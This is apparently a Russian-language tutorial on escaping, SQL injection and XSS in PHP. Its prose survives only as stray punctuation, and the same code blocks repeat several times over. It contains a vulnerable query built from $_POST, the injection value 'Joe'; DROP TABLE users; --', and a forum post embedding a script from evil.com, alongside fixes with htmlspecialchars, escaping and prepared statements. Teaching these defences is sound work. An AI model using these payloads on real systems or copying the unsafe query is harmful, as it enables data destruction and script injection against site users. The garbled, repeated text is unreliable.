<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

